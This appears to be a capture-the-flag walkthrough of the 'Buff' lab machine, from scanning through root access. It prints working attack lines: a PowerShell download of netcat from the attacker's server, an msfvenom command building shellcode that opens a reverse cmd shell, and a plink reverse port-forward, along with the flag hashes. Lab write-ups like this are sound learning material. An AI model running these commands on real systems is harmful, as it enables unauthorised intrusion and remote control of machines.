Windows Boxes

buff

  1. nmap
  2. gym management software 1.0
    1. unauthenticated RCE exploit
    2. reverse shell
  3. privesc w/ Cloud_1112.exe
    1. searchsploit CloudMe
    2. generate shell code
    3. plink
    4. reverse shell
  4. user/root

buff

images/1647-1.png
images/1647-2.png

nmap

images/1648-1.png
nmap shows the only service running is http on port 8080

gym management software 1.0

navigating through the web server's contact.php page, there is a note that Buff's webserver uses Gym Management Software 1.0 to run its webserver.

images/1649-1.png


Googling Gym Management Software returns an Unauthenticated Remote Code Execution vulnerability
images/1649-2.png

images/1649-3.png

unauthenticated RCE exploit

images/1651-1.png

images/1651-2.png

we can look up the exploit locally using searchsploit and the exploit database ID number
images/1651-3.png


python gym_software_exploit.py http://10.10.10.198:8080/ <- don't forget the trailing backslash
images/1651-4.png

we have a foothold!
But since the shell is limited, lets call a fully functional shell back to our attack machine

reverse shell

An easy way to do that is to have our victim download netcat for windows and execute it remotely to call a shell back to us

first locate nc.exe and mv it to your working directory and spin up an http server
images/1652-1.png
images/1652-2.png

and have our victim download it
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.13/nc.exe','C:\xampp\htdocs\gym\upload\nc.exe')
images/1652-3.png
images/1652-4.png


images/1652-5.png
images/1652-6.png

privesc w/ Cloud_1112.exe

looking at our owned user shaun's download folder we see an interesting executable named CloudMe_1112.exe

images/1660-1.png

searchsploit CloudMe

images/1656-1.png

we'll choose the first exploit and mirror it to our directory with searchsploit -m windows/remote/48389
images/1656-2.png

generate shell code

since the buffer overflow is mostly already written for us, all we need to do is tweak the shellcode that will call back to our attack machine

msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.62 4444' -f py -b '/x00/x0a/x0d' -v payload
images/1657-1.png

images/1657-2.png

now sub out 48389's shellcode with our msfvenom generated shellcode
images/1657-3.png

plink

we want to forward our port to the victim box so we can run the exploit locally on our attacking machine since BUFF does not support python

first download plink to our windows victim with a powershell downloadfile cmd
images/1658-1.png
images/1658-2.png
images/1658-3.png


plink.exe -l st0ve -pw 12345 10.10.14.62 -R 8888:127.0.0.1:8888
images/1658-4.png+

images/1658-5.png

reverse shell

make sure you set up your listener from user st0ve since thats what our victim is plinked to


we run our exploit which attacks oour localhost (127.0.0.1 on port 8888 which forwards to Buff's port 8888)and....
images/1659-1.png

we're root
images/1659-2.png

user/root

images/1654-1.png
29a8c6e451149cf2499ebabeb7aec7d4

images/1654-2.png
d8f697cf088291568ccf206c16ea3b49